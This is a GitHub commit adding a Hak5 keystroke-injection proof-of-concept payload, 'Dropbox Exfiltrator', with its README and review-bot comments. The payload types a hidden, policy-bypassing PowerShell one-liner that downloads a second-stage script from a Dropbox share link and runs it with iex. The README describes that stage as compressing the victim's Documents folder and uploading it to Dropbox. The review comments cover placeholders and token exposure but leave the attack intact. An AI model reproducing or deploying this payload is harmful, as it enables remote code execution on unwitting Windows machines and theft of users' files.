Added dropbox exfiltrator PoC payload

pull/374/head
Darren Kitchen 2019-01-30 12:17:55 -08:00 committed by GitHub
parent 55c7d4f706
commit d341068548
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 49 additions and 0 deletions

@ -0,0 +1,15 @@
# Dropbox Exfiltrator
# Author: Hak5Darren
# Props: jimcola99 Buchanan
# Demo: Hak5 episode 2505
# Target: Windows Vista+
# Category: Exfiltration
LED SETUP
ATTACKMODE HID
LED ATTACK
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -Exec Bypass \"\$e=\\\"\$env:TMP/e.ps1\\\"\;iwr https://www.dropbox.com/s/61jx6u40orxmvzz/exfil.ps1?dl=1 -O \$e\;iex \$e\;rm \$e\"
QUACK ENTER
LED FINISH
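
Review bot: the `QUACK STRING` line hard-codes one specific Dropbox share link (`.../exfil.ps1?dl=1`) and passes whatever that link returns straight to `iex`, so a copy of this file used unmodified runs a script whose content is controlled by the link's owner and can change at any time. Since the README's Step 4 expects the link to be replaced anyway, ship an obviously invalid placeholder here instead of a live URL, and add a header comment next to `# Target:` stating that the link must be set before use. The header block also has no description or requirements line, so a reader of this file alone cannot tell that a second stage and a Dropbox token are involved.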

@ -0,0 +1,34 @@
# Dropbox Exfiltrator Proof-of-Concept
* Author: Hak5Darren
* Props: jimcola99 Buchanan
* Demo: Hak5 episode 2505
* Target: Windows Vista+
* Category: Exfiltration
## Proof of Concept
This payload is not robust and is meant for demonstration purposes only. Known issues include the 150 MB file chunking limitation with Dropbox, as well as the IWR/IEX method and compression overhead. Please feel free to clean up.
## Description
Staged powershell payload which downloads and executes exfil.ps1 from dropbox which compresses the users documents folder and uploads it to dropbox.
## Requirements
* Step 1. Create a Dropbox app using their API and generate an access token from https://www.dropbox.com/developers/apps/create
* Step 2. Customize the powershell second stage exfil.ps1 file to exfiltrate the loot to Dropbox using the token generated above
* Step 3. Get a direct dropbox link for the powershell file (right-click exfil.ps1, get dropbox link, replace dl=0 with dl=1)
* Step 4. Customize the exfiltration payload.txt to use the dropbox link from above
* Step 5. ???
* Step 6. h4x
## STATUS
| LED | Status |
| ----------------- | -------------------------------------- |
| SETUP | Setting attack mode |
| ATACK | Injecting keystrokes |
| FINISH | All done |
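
Review bot: the Requirements list has Step 2 embed the Dropbox access token in exfil.ps1 and Step 3 publish that same file through a direct share link, which means the token is readable by anyone who obtains the link, and the README does not mention this. Add a sentence saying so, and recommend limiting the app's access to its own app folder and revoking the token once the demonstration is over. Smaller points in the same hunk: the STATUS table row reads `ATACK` but the payload uses `LED ATTACK`; "users documents folder" should be "user's Documents folder"; "powershell" and "dropbox" are inconsistently capitalized; and Steps 5 and 6 ("???", "h4x") are not requirements and should be dropped from that list.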